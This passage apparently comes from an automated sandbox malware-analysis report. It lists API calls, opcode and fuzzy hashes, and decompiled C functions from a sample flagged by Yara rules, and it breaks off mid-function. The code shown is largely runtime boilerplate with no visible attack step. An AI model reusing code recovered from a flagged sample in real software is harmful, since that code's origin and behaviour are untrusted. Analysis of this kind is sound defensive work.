                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0225FD0A
                Memory Dump Source
                • Source File: 00000003.00000002.488662968.0000000002250000.00000040.00000001.sdmp, Offset: 02250000, based on PE: false
                Similarity
                • API ID: CreateWindow
                • String ID:
                • API String ID: 716092398-0
                • Opcode ID: 3c4d0fbb3cbc8410bdd42afd764ba6c78fd6e62d26ae5b876b3e344d185fb4ed
                • Instruction ID: 72bc1fb9aa9805ca7af5fa7cba6271024394517b32da59fc7efd583a4b573da3
                • Opcode Fuzzy Hash: 3c4d0fbb3cbc8410bdd42afd764ba6c78fd6e62d26ae5b876b3e344d185fb4ed
                • Instruction Fuzzy Hash: E441DEB1D103199FDF14CFAAC984ADEBBB5BF48304F24812AE819AB214D7749845CF90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0225BD87
                Memory Dump Source
                • Source File: 00000003.00000002.488662968.0000000002250000.00000040.00000001.sdmp, Offset: 02250000, based on PE: false
                Similarity
                • API ID: DuplicateHandle
                • String ID:
                • API String ID: 3793708945-0
                • Opcode ID: 886c1f5a4cdf673e2914c91f68d1e0c5a19048aef05564f65a72eb1878403e25
                • Instruction ID: 0ac8be198791fe440e120418afaadbf82597a7196347567491a6b9cea7bf251f
                • Opcode Fuzzy Hash: 886c1f5a4cdf673e2914c91f68d1e0c5a19048aef05564f65a72eb1878403e25
                • Instruction Fuzzy Hash: 9721E3B59052599FDB10CFA9D884AEEFFF4EB48314F14841AE958A7310C378AA45CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0225BD87
                Memory Dump Source
                • Source File: 00000003.00000002.488662968.0000000002250000.00000040.00000001.sdmp, Offset: 02250000, based on PE: false
                Similarity
                • API ID: DuplicateHandle
                • String ID:
                • API String ID: 3793708945-0
                • Opcode ID: baec86fb90106dca584f6fd9af2170a57a6204af61f0c0a0120c59024d65eee1
                • Instruction ID: f950517c5ba22e76000107d895b2610037b1aad8a175448fb082468a169c3824
                • Opcode Fuzzy Hash: baec86fb90106dca584f6fd9af2170a57a6204af61f0c0a0120c59024d65eee1
                • Instruction Fuzzy Hash: CC21C4B59002599FDB10CFAAD984ADEFBF4EB48314F14841AE918B7310D374A944CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,022596A9,00000800,00000000,00000000), ref: 022598BA
                Memory Dump Source
                • Source File: 00000003.00000002.488662968.0000000002250000.00000040.00000001.sdmp, Offset: 02250000, based on PE: false
                Similarity
                • API ID: LibraryLoad
                • String ID:
                • API String ID: 1029625771-0
                • Opcode ID: 3906c6e973f813dc742040c0475aa095405cdfa2f30f0b09ee22debd160bb663
                • Instruction ID: a6aac423e726937c15a0b29802bb70316490707372169f25941da48d9f0d8183
                • Opcode Fuzzy Hash: 3906c6e973f813dc742040c0475aa095405cdfa2f30f0b09ee22debd160bb663
                • Instruction Fuzzy Hash: E12106B2D042598FDB10CFAAC448ADEFBF4EB48314F15842ED929BB200C378A545CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,022596A9,00000800,00000000,00000000), ref: 022598BA
                Memory Dump Source
                • Source File: 00000003.00000002.488662968.0000000002250000.00000040.00000001.sdmp, Offset: 02250000, based on PE: false
                Similarity
                • API ID: LibraryLoad
                • String ID:
                • API String ID: 1029625771-0
                • Opcode ID: f506300af95bbecd34dae9c4ec776a8753e0adc69192ee7467386c2ae6bfc46d
                • Instruction ID: 2fb9bda74aafed39404f29a84cf6da3c2176ec9b534a0d44704acc6335cfc97f
                • Opcode Fuzzy Hash: f506300af95bbecd34dae9c4ec776a8753e0adc69192ee7467386c2ae6bfc46d
                • Instruction Fuzzy Hash: 4D11F2B69042499FCB10CF9AC448ADEFBF4AB48314F14842EE929B7604C379A945CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 02257F5D
                Memory Dump Source
                • Source File: 00000003.00000002.488662968.0000000002250000.00000040.00000001.sdmp, Offset: 02250000, based on PE: false
                Similarity
                • API ID: CallbackDispatcherUser
                • String ID:
                • API String ID: 2492992576-0
                • Opcode ID: f0e1fa45a1a8f1ac7b6d301fdc457c8e60ea73240bef48380f11b97a464dd039
                • Instruction ID: 0c68689b2f4807085aeffb4b24d0adb1a48bca432d4f45b0d85fcc50d6b898a7
                • Opcode Fuzzy Hash: f0e1fa45a1a8f1ac7b6d301fdc457c8e60ea73240bef48380f11b97a464dd039
                • Instruction Fuzzy Hash: 7921AF718097998FDB11CFA5D8043EFFFF4AB06314F14849AD895B7282C7789606CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetModuleHandleW.KERNELBASE(00000000), ref: 0225962E
                Memory Dump Source
                • Source File: 00000003.00000002.488662968.0000000002250000.00000040.00000001.sdmp, Offset: 02250000, based on PE: false
                Similarity
                • API ID: HandleModule
                • String ID:
                • API String ID: 4139908857-0
                • Opcode ID: 8b7b97d9dfa152cbaa4486e247882afb064a66431650566206795637b70bfcda
                • Instruction ID: a4130a866b2edab0d437f87ac3b292caaefc6dfcd9c0d693d6adc0d8e77aa87b
                • Opcode Fuzzy Hash: 8b7b97d9dfa152cbaa4486e247882afb064a66431650566206795637b70bfcda
                • Instruction Fuzzy Hash: 9511E0B5D00699CFCB10CF9AC444BDEFBF4AB89214F14C52AD829B7604D375A54ACFA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SetWindowLongW.USER32(?,?,?), ref: 0225FE9D
                Memory Dump Source
                • Source File: 00000003.00000002.488662968.0000000002250000.00000040.00000001.sdmp, Offset: 02250000, based on PE: false
                Similarity
                • API ID: LongWindow
                • String ID:
                • API String ID: 1378638983-0
                • Opcode ID: 287c456564ca7821b7a5f00b121f154e9b87d459a2ead8a4a0608c0859834914
                • Instruction ID: f06cdbf5500c37e3c36d2f2a5d0f441dddbe6bfd3ad3243b5bc4bc2b709e9e0b
                • Opcode Fuzzy Hash: 287c456564ca7821b7a5f00b121f154e9b87d459a2ead8a4a0608c0859834914
                • Instruction Fuzzy Hash: C91133B19003498FDB10CF99D589BDEFBF4EB49324F10845AE819A7701C374AA45CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SetWindowLongW.USER32(?,?,?), ref: 0225FE9D
                Memory Dump Source
                • Source File: 00000003.00000002.488662968.0000000002250000.00000040.00000001.sdmp, Offset: 02250000, based on PE: false
                Similarity
                • API ID: LongWindow
                • String ID:
                • API String ID: 1378638983-0
                • Opcode ID: e2b6a48035fb87ce82fe15b8e9810b92e3a0abf34e477a73bd1e6cb4e8529218
                • Instruction ID: 9014411bbf7e21a1914d4a52db10ad8ef04dfe9f8ba19b1adab70ee51b844ce2
                • Opcode Fuzzy Hash: e2b6a48035fb87ce82fe15b8e9810b92e3a0abf34e477a73bd1e6cb4e8529218
                • Instruction Fuzzy Hash: E81100B59002498FDB10CF9AD585BDFFBF8EB48324F20841AE818A7700C374A944CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 94%
                			E00403E3D(void* __ecx, long _a4) {
                				void* _t4;
                				void* _t6;
                				void* _t7;
                				long _t8;
                
                				_t7 = __ecx;
                				_t8 = _a4;
                				if(_t8 > 0xffffffe0) {
                					L7:
                					 *((intOrPtr*)(E00404831())) = 0xc;
                					__eflags = 0;
                					return 0;
                				}
                				if(_t8 == 0) {
                					_t8 = _t8 + 1;
                				}
                				while(1) {
                					_t4 = RtlAllocateHeap( *0x4132b0, 0, _t8); // executed
                					if(_t4 != 0) {
                						break;
                					}
                					__eflags = E00403829();
                					if(__eflags == 0) {
                						goto L7;
                					}
                					_t6 = E004068FD(_t7, __eflags, _t8);
                					_pop(_t7);
                					__eflags = _t6;
                					if(_t6 == 0) {
                						goto L7;
                					}
                				}
                				return _t4;
                			}

                APIs
                • RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                Memory Dump Source
                • Source File: 00000003.00000001.247203349.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000001.247277523.0000000000414000.00000040.00020000.sdmp
                Yara matches
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
                • Instruction ID: 2c5ed35c3885d6f2518923907421e71a1374dda36297243b1d9f5d3b1e0eb56a
                • Opcode Fuzzy Hash: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
                • Instruction Fuzzy Hash: 54E03922505222A6D6213F6ADC04F5B7E4C9F817A2F158777AD15B62D0CB389F0181ED
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000003.00000002.486793651.000000000061D000.00000040.00000001.sdmp, Offset: 0061D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 36d542a973339ab2687f5cb17cd84cea4f142bcfc2b83053e1972f62da3be66a
                • Instruction ID: 866c985d20ec7b67a4cc2fc154f4f4570e00832b5646b12146a2e5063aa40c34
                • Opcode Fuzzy Hash: 36d542a973339ab2687f5cb17cd84cea4f142bcfc2b83053e1972f62da3be66a
                • Instruction Fuzzy Hash: 19212970508244EFDB01CF14D9C0BAABBA6FB84314F38C66DEA094B356C336D986CB61
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000003.00000002.486793651.000000000061D000.00000040.00000001.sdmp, Offset: 0061D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 196ac475abbbcacd6147c91b3fdea45e124b29b11a74ff3a0893c04002a973b0
                • Instruction ID: b3c06adc395a7a14c5cdb9faf2b1322df1564f9327719114d87b8b662d5e4862
                • Opcode Fuzzy Hash: 196ac475abbbcacd6147c91b3fdea45e124b29b11a74ff3a0893c04002a973b0
                • Instruction Fuzzy Hash: 5A21F575608244EFCB14CF14D8C0BAABB66FB88315F28C56DE9094B346C336D887CB61
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000003.00000002.486793651.000000000061D000.00000040.00000001.sdmp, Offset: 0061D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1796907d7eb6b164800821065843d9a4ec7af556d4702eacd812f321748dffe5
                • Instruction ID: 2a64f76003013b792545ffc88a1a7fc993d96f6feaf22159e591a9cd290ffaa5
                • Opcode Fuzzy Hash: 1796907d7eb6b164800821065843d9a4ec7af556d4702eacd812f321748dffe5
                • Instruction Fuzzy Hash: A62180755093C09FCB02CF24D990755BF71EB46314F28C5DAD8498B6A7C33A984ACB62
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000003.00000002.486793651.000000000061D000.00000040.00000001.sdmp, Offset: 0061D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 782f9e41915746642c1b3bc8a08954d687731868874878b396c9b934aeaa4875
                • Instruction ID: 018bb7f46b7d5f0f7085a6720a87f488fe8acccadb1091ae1b5949318f44d7df
                • Opcode Fuzzy Hash: 782f9e41915746642c1b3bc8a08954d687731868874878b396c9b934aeaa4875
                • Instruction Fuzzy Hash: FB119D75904280DFCB11CF14D5C4B95FBA2FB84314F28C6AED9494B766C33AD94ACB61
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                C-Code - Quality: 74%
                			E0040446F(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                				char _v0;
                				signed int _v8;
                				intOrPtr _v524;
                				intOrPtr _v528;
                				void* _v532;
                				intOrPtr _v536;
                				char _v540;
                				intOrPtr _v544;
                				intOrPtr _v548;
                				intOrPtr _v552;
                				intOrPtr _v556;
                				intOrPtr _v560;
                				intOrPtr _v564;
                				intOrPtr _v568;
                				intOrPtr _v572;
                				intOrPtr _v576;
                				intOrPtr _v580;
                				intOrPtr _v584;
                				char _v724;
                				intOrPtr _v792;
                				intOrPtr _v800;
                				char _v804;
                				struct _EXCEPTION_POINTERS _v812;
                				void* __edi;
                				signed int _t40;
                				char* _t47;
                				char* _t49;
                				long _t57;
                				intOrPtr _t59;
                				intOrPtr _t60;
                				intOrPtr _t64;
                				intOrPtr _t65;
                				int _t66;
                				intOrPtr _t68;
                				signed int _t69;
                
                				_t68 = __esi;
                				_t64 = __edx;
                				_t59 = __ebx;
                				_t40 =  *0x412014; // 0xf7147b27
                				_t41 = _t40 ^ _t69;
                				_v8 = _t40 ^ _t69;
                				_push(_t65);
                				if(_a4 != 0xffffffff) {
                					_push(_a4);
                					E00401E6A(_t41);
                					_pop(_t60);
                				}
                				E00402460(_t65,  &_v804, 0, 0x50);
                				E00402460(_t65,  &_v724, 0, 0x2cc);
                				_v812.ExceptionRecord =  &_v804;
                				_t47 =  &_v724;
                				_v812.ContextRecord = _t47;
                				_v548 = _t47;
                				_v552 = _t60;
                				_v556 = _t64;
                				_v560 = _t59;
                				_v564 = _t68;
                				_v568 = _t65;
                				_v524 = ss;
                				_v536 = cs;
                				_v572 = ds;
                				_v576 = es;
                				_v580 = fs;
                				_v584 = gs;
                				asm("pushfd");
                				_pop( *_t22);
                				_v540 = _v0;
                				_t49 =  &_v0;
                				_v528 = _t49;
                				_v724 = 0x10001;
                				_v544 =  *((intOrPtr*)(_t49 - 4));
                				_v804 = _a8;
                				_v800 = _a12;
                				_v792 = _v0;
                				_t66 = IsDebuggerPresent();
                				SetUnhandledExceptionFilter(0);
                				_t57 = UnhandledExceptionFilter( &_v812);
                				if(_t57 == 0 && _t66 == 0 && _a4 != 0xffffffff) {
                					_push(_a4);
                					_t57 = E00401E6A(_t57);
                				}
                				E004018CC();
                				return _t57;
                			}

                APIs
                • IsDebuggerPresent.KERNEL32 ref: 00404567
                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00404571
                • UnhandledExceptionFilter.KERNEL32(?), ref: 0040457E
                Memory Dump Source
                • Source File: 00000003.00000002.485375087.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                • String ID:
                • API String ID: 3906539128-0
                • Opcode ID: 2402715568fd3a7f033aea0833c586b82d8bbb398bbe1fad897268afcc2e17dd
                • Instruction ID: 1195a769eb9e4d04bd79abb1e2ff1cfbb043d98aa737aaf25acc392e7af51fe4
                • Opcode Fuzzy Hash: 2402715568fd3a7f033aea0833c586b82d8bbb398bbe1fad897268afcc2e17dd
                • Instruction Fuzzy Hash: 5931C674901218EBCB21DF64DD8878DB7B4BF48310F5042EAE50CA7290E7749F858F49
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 86%
                			E0040208D(intOrPtr __edx) {
                				signed int _v8;
                				signed int _v12;
                				signed int _v16;
                				signed int _v20;
                				signed char _v24;
                				signed int _v28;
                				signed int _v32;
                				signed int _v36;
                				signed int _v40;
                				signed int _v44;
                				signed int _v48;
                				signed int _t59;
                				signed int _t62;
                				signed int _t63;
                				intOrPtr _t65;
                				signed int _t66;
                				signed int _t68;
                				intOrPtr _t73;
                				intOrPtr* _t75;
                				intOrPtr* _t77;
                				intOrPtr _t84;
                				intOrPtr* _t86;
                				signed int _t91;
                				signed int _t94;
                
                				_t84 = __edx;
                				 *0x412b2c =  *0x412b2c & 0x00000000;
                				 *0x412030 =  *0x412030 | 1;
                				if(IsProcessorFeaturePresent(0xa) == 0) {
                					L20:
                					return 0;
                				}
                				_v24 = _v24 & 0x00000000;
                				 *0x412030 =  *0x412030 | 0x00000002;
                				 *0x412b2c = 1;
                				_t86 =  &_v48;
                				_push(1);
                				asm("cpuid");
                				_pop(_t73);
                				 *_t86 = 0;
                				 *((intOrPtr*)(_t86 + 4)) = 1;
                				 *((intOrPtr*)(_t86 + 8)) = 0;
                				 *((intOrPtr*)(_t86 + 0xc)) = _t84;
                				_v16 = _v48;
                				_v8 = _v36 ^ 0x49656e69;
                				_v12 = _v40 ^ 0x6c65746e;
                				_push(1);
                				asm("cpuid");
                				_t75 =  &_v48;
                				 *_t75 = 1;
                				 *((intOrPtr*)(_t75 + 4)) = _t73;
                				 *((intOrPtr*)(_t75 + 8)) = 0;
                				 *((intOrPtr*)(_t75 + 0xc)) = _t84;
                				if((_v44 ^ 0x756e6547 | _v8 | _v12) != 0) {
                					L9:
                					_t91 =  *0x412b30; // 0x2
                					L10:
                					_v32 = _v36;
                					_t59 = _v40;
                					_v8 = _t59;
                					_v28 = _t59;
                					if(_v16 >= 7) {
                						_t65 = 7;
                						_push(_t75);
                						asm("cpuid");
                						_t77 =  &_v48;
                						 *_t77 = _t65;
                						 *((intOrPtr*)(_t77 + 4)) = _t75;
                						 *((intOrPtr*)(_t77 + 8)) = 0;
                						 *((intOrPtr*)(_t77 + 0xc)) = _t84;
                						_t66 = _v44;
                						_v24 = _t66;
                						_t59 = _v8;
                						if((_t66 & 0x00000200) != 0) {
                							 *0x412b30 = _t91 | 0x00000002;
                						}
                					}
                					if((_t59 & 0x00100000) != 0) {
                						 *0x412030 =  *0x412030 | 0x00000004;
                						 *0x412b2c = 2;
                						if((_t59 & 0x08000000) != 0 && (_t59 & 0x10000000) != 0) {
                							asm("xgetbv");
                							_v20 = _t59;
                							_v16 = _t84;
                							if((_v20 & 0x00000006) == 6 && 0 == 0) {
                								_t62 =  *0x412030; // 0x2f
                								_t63 = _t62 | 0x00000008;
                								 *0x412b2c = 3;
                								 *0x412030 = _t63;
                								if((_v24 & 0x00000020) != 0) {
                									 *0x412b2c = 5;
                									 *0x412030 = _t63 | 0x00000020;
                								}
                							}
                						}
                					}
                					goto L20;
                				}
                				_t68 = _v48 & 0x0fff3ff0;
                				if(_t68 == 0x106c0 || _t68 == 0x20660 || _t68 == 0x20670 || _t68 == 0x30650 || _t68 == 0x30660 || _t68 == 0x30670) {
                					_t94 =  *0x412b30; // 0x2
                					_t91 = _t94 | 0x00000001;
                					 *0x412b30 = _t91;
                					goto L10;
                				} else {
                					goto L9;
                				}
                			}

                APIs
                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 004020A6
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.485375087.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: FeaturePresentProcessor
                • String ID:
                • API String ID: 2325560087-3916222277
                • Opcode ID: 81a6643d8d766bf2a1e14be1042f56af57549ae9e9951545f306693b5f2864aa
                • Instruction ID: 00a0b3a4e6e1703bd72bf57860e68eebd2cbb95fa7def28fde3004e4e54fdf29
                • Opcode Fuzzy Hash: 81a6643d8d766bf2a1e14be1042f56af57549ae9e9951545f306693b5f2864aa
                • Instruction Fuzzy Hash: 02515AB19102099BDB15CFA9DA8979ABBF4FB08314F14C57AD804EB390D3B8A915CF58
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004067FE() {
                				signed int _t3;
                
                				_t3 = GetProcessHeap();
                				 *0x4132b0 = _t3;
                				return _t3 & 0xffffff00 | _t3 != 0x00000000;
                			}

                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.485375087.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: HeapProcess
                • String ID:
                • API String ID: 54951025-0
                • Opcode ID: 4abe4d7e697a5e334cba9e91fa50753fcf89eadab84e16c7efba8372fc9c1de6
                • Instruction ID: ab0ad82ebdde72e163074a118323e5abeae2aeda4b6cf9790db401cd62e62c3c
                • Opcode Fuzzy Hash: 4abe4d7e697a5e334cba9e91fa50753fcf89eadab84e16c7efba8372fc9c1de6
                • Instruction Fuzzy Hash: F7A011B0200200CBC3008F38AA8820A3AA8AA08282308C2B8A008C00A0EB388088AA08
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 70%
                			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                				signed int _v8;
                				int _v12;
                				void* _v24;
                				signed int _t49;
                				signed int _t54;
                				int _t56;
                				signed int _t58;
                				short* _t60;
                				signed int _t64;
                				short* _t68;
                				int _t76;
                				short* _t79;
                				signed int _t85;
                				signed int _t88;
                				void* _t93;
                				void* _t94;
                				int _t96;
                				short* _t99;
                				int _t101;
                				int _t103;
                				signed int _t104;
                				short* _t105;
                				void* _t108;
                
                				_push(__ecx);
                				_push(__ecx);
                				_t49 =  *0x412014; // 0xf7147b27
                				_v8 = _t49 ^ _t104;
                				_t101 = _a20;
                				if(_t101 > 0) {
                					_t76 = E004080DB(_a16, _t101);
                					_t108 = _t76 - _t101;
                					_t4 = _t76 + 1; // 0x1
                					_t101 = _t4;
                					if(_t108 >= 0) {
                						_t101 = _t76;
                					}
                				}
                				_t96 = _a32;
                				if(_t96 == 0) {
                					_t96 =  *( *_a4 + 8);
                					_a32 = _t96;
                				}
                				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
                				_v12 = _t54;
                				if(_t54 == 0) {
                					L38:
                					E004018CC();
                					return _t54;
                				} else {
                					_t93 = _t54 + _t54;
                					_t83 = _t93 + 8;
                					asm("sbb eax, eax");
                					if((_t93 + 0x00000008 & _t54) == 0) {
                						_t79 = 0;
                						__eflags = 0;
                						L14:
                						if(_t79 == 0) {
                							L36:
                							_t103 = 0;
                							L37:
                							E004063D5(_t79);
                							_t54 = _t103;
                							goto L38;
                						}
                						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
                						_t119 = _t56;
                						if(_t56 == 0) {
                							goto L36;
                						}
                						_t98 = _v12;
                						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
                						_t103 = _t58;
                						if(_t103 == 0) {
                							goto L36;
                						}
                						if((_a12 & 0x00000400) == 0) {
                							_t94 = _t103 + _t103;
                							_t85 = _t94 + 8;
                							__eflags = _t94 - _t85;
                							asm("sbb eax, eax");
                							__eflags = _t85 & _t58;
                							if((_t85 & _t58) == 0) {
                								_t99 = 0;
                								__eflags = 0;
                								L30:
                								__eflags = _t99;
                								if(__eflags == 0) {
                									L35:
                									E004063D5(_t99);
                									goto L36;
                								}
                								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
                								__eflags = _t60;
                								if(_t60 == 0) {
                									goto L35;
                								}
                								_push(0);
                								_push(0);
                								__eflags = _a28;
                								if(_a28 != 0) {
                									_push(_a28);
                									_push(_a24);
                								} else {
                									_push(0);
                									_push(0);
                								}
                								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
                								__eflags = _t103;
                								if(_t103 != 0) {
                									E004063D5(_t99);
                									goto L37;
                								} else {
                									goto L35;
                								}
                							}
                							_t88 = _t94 + 8;
                							__eflags = _t94 - _t88;
                							asm("sbb eax, eax");
                							_t64 = _t58 & _t88;
                							_t85 = _t94 + 8;
                							__eflags = _t64 - 0x400;
                							if(_t64 > 0x400) {
                								__eflags = _t94 - _t85;
                								asm("sbb eax, eax");
                								_t99 = E00403E3D(_t85, _t64 & _t85);
                								_pop(_t85);
                								__eflags = _t99;
                								if(_t99 == 0) {
                									goto L35;
                								}
                								 *_t99 = 0xdddd;
                								L28:
                								_t99 =  &(_t99[4]);
                								goto L30;
                							}
                							__eflags = _t94 - _t85;
                							asm("sbb eax, eax");
                							E004018E0();
                							_t99 = _t105;
                							__eflags = _t99;
                							if(_t99 == 0) {
                								goto L35;
                							}
                							 *_t99 = 0xcccc;
                							goto L28;
                						}
                						_t68 = _a28;
                						if(_t68 == 0) {
                							goto L37;
                						}
                						_t123 = _t103 - _t68;
                						if(_t103 > _t68) {
                							goto L36;
                						}
                						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
                						if(_t103 != 0) {
                							goto L37;
                						}
                						goto L36;
                					}
                					asm("sbb eax, eax");
                					_t70 = _t54 & _t93 + 0x00000008;
                					_t83 = _t93 + 8;
                					if((_t54 & _t93 + 0x00000008) > 0x400) {
                						__eflags = _t93 - _t83;
                						asm("sbb eax, eax");
                						_t79 = E00403E3D(_t83, _t70 & _t83);
                						_pop(_t83);
                						__eflags = _t79;
                						if(__eflags == 0) {
                							goto L36;
                						}
                						 *_t79 = 0xdddd;
                						L12:
                						_t79 =  &(_t79[4]);
                						goto L14;
                					}
                					asm("sbb eax, eax");
                					E004018E0();
                					_t79 = _t105;
                					if(_t79 == 0) {
                						goto L36;
                					}
                					 *_t79 = 0xcccc;
                					goto L12;
                				}
                			}

                APIs
                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00407B20,?,?,00000000), ref: 00407929
                • __alloca_probe_16.LIBCMT ref: 00407961
                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00407B20,?,?,00000000,?,?,?), ref: 004079AF
                • __alloca_probe_16.LIBCMT ref: 00407A46
                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00407AA9
                • __freea.LIBCMT ref: 00407AB6
                  • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                • __freea.LIBCMT ref: 00407ABF
                • __freea.LIBCMT ref: 00407AE4
                Memory Dump Source
                • Source File: 00000003.00000001.247203349.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000001.247277523.0000000000414000.00000040.00020000.sdmp
                Yara matches
                Similarity
                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                • String ID:
                • API String ID: 3864826663-0
                • Opcode ID: 4e2b16b33ddca4ab3ce0f4135b96e08b33a6f9acdfd16cac7d83fd7473779ac7
                • Instruction ID: 6b6c65cbb01c1feb5c42b87555946cb45975c344a51f119bfb313b5904e0f739
                • Opcode Fuzzy Hash: 4e2b16b33ddca4ab3ce0f4135b96e08b33a6f9acdfd16cac7d83fd7473779ac7
                • Instruction Fuzzy Hash: BA51D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 72%
                			E00408226(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                				signed int _v8;
                				signed char _v15;
                				char _v16;
                				void _v24;
                				short _v28;
                				char _v31;
                				void _v32;
                				long _v36;
                				intOrPtr _v40;
                				void* _v44;
                				signed int _v48;
                				signed char* _v52;
                				long _v56;
                				int _v60;
                				void* __ebx;
                				signed int _t78;
                				signed int _t80;
                				int _t86;
                				void* _t93;
                				long _t96;
                				void _t104;
                				void* _t111;
                				signed int _t115;
                				signed int _t118;
                				signed char _t123;
                				signed char _t128;
                				intOrPtr _t129;
                				signed int _t131;
                				signed char* _t133;
                				intOrPtr* _t136;
                				signed int _t138;
                				void* _t139;
                
                				_t78 =  *0x412014; // 0xf7147b27
                				_v8 = _t78 ^ _t138;
                				_t80 = _a8;
                				_t118 = _t80 >> 6;
                				_t115 = (_t80 & 0x0000003f) * 0x30;
                				_t133 = _a12;
                				_v52 = _t133;
                				_v48 = _t118;
                				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4130a0 + _t118 * 4)) + _t115 + 0x18));
                				_v40 = _a16 + _t133;
                				_t86 = GetConsoleCP();
                				_t136 = _a4;
                				_v60 = _t86;
                				 *_t136 = 0;
                				 *((intOrPtr*)(_t136 + 4)) = 0;
                				 *((intOrPtr*)(_t136 + 8)) = 0;
                				while(_t133 < _v40) {
                					_v28 = 0;
                					_v31 =  *_t133;
                					_t129 =  *((intOrPtr*)(0x4130a0 + _v48 * 4));
                					_t123 =  *(_t129 + _t115 + 0x2d);
                					if((_t123 & 0x00000004) == 0) {
                						if(( *(E00405FC6(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
                							_push(1);
                							_push(_t133);
                							goto L8;
                						} else {
                							if(_t133 >= _v40) {
                								_t131 = _v48;
                								 *((char*)( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
                								 *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
                								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
                							} else {
                								_t111 = E00407222( &_v28, _t133, 2);
                								_t139 = _t139 + 0xc;
                								if(_t111 != 0xffffffff) {
                									_t133 =  &(_t133[1]);
                									goto L9;
                								}
                							}
                						}
                					} else {
                						_t128 = _t123 & 0x000000fb;
                						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
                						_push(2);
                						_v15 = _t128;
                						 *(_t129 + _t115 + 0x2d) = _t128;
                						_push( &_v16);
                						L8:
                						_push( &_v28);
                						_t93 = E00407222();
                						_t139 = _t139 + 0xc;
